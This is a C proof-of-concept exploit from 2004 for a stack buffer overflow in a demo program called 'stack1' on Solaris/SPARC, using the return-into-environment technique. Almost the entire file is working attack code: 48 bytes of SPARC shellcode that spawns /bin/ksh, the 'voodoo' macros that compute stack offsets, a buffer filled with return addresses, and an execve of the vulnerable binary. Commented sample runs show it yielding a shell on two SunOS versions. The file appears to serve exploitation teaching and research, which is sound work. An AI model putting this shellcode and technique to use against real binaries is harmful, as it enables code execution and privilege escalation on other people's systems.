/*
 * $Id: stack1-ex3.c,v 1.2 2004/11/13 12:40:53 raptor Exp $
 *
 * stack1-ex3.c - stack1.c exploit (Solaris/SPARC stack-based)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit demonstrates the return into environment technique on
 * Solaris/SPARC architecture. Thanks to inode <inode@deadlocks.info>
 * for his interesting research in this area. 
 *
 * Note the voodoo macros for Solaris stack offset calculation ;) Thanks to
 * Fozzy <fozzy@dmpfrance.com> for his interesting research on this topic.
 *
 * De-obfuscated code follows:
 *
 * if (rel > 7)
 *	offset += 7 - ((offset + (arg_pos + env_pos + 1) * 4 + 3) % 8);
 * else {
 *	offset--;
 *	offset += (((plat_len + prog_len - 1) % 4 - (offset % 4)) < 0) ?
 *	    (8 - offset % 4) : (4 - offset % 4);
 * }
 *
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./stack1-ex3
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using stack base        : 0xffbffffc
 * Using stack offset      : 424
 * Using ret address       : 0xffbfffac
 * $ 
 *
 * bash-2.05$ uname -a
 * SunOS sparchina 5.6 Generic_105181-05 sun4c sparc SUNW,Sun_4_50
 * bash-2.05$ gcc --version
 * 2.95.3
 * bash-2.05$ ./stack1-ex3
 * Using SI_PLATFORM       : SUNW,Sun_4_50 (5.6)
 * Using stack base        : 0xeffffffc
 * Using stack offset      : 420
 * Using ret address       : 0xefffffb0
 * $ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULN 	"./stack1"	// the vulnerable program
#define BUF	256 + 80 + 1	// size of the evil buffer

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* (ugly) global variables */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* 
 * add_arg(): add an argument to argv 
 */
int add_arg(char * string)
{
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);	
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char * string)
{
	int 	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;	
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}
	
	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg()
{
	int 	pad;
	char 	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * main()
 */
int main(int argc, char **argv)
{
	char 	buf[BUF];
	char 	platform[256], release[256];

	char 	*p = buf;
	int 	ret, offset, i, rel;
	int	plat_len, prog_len;

	/* get the stack base */
	int 	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* fill the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* put our shellcode in envp, keeping padding */
	add_env(sc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)
		
	/* calculate the retaddr in envp[0] */
	ret = sb - offset + arg_len;

	/* fill the whole buffer with retaddr - 8 */
	for (i = 0; i < BUF - 1; i += 4, p += 4)
		*((void **)p) = (void *)(ret - 8);

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", sb);
	fprintf(stderr, "Using stack offset\t: %d\n", offset);
	fprintf(stderr, "Using ret address\t: 0x%p\n", ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
}
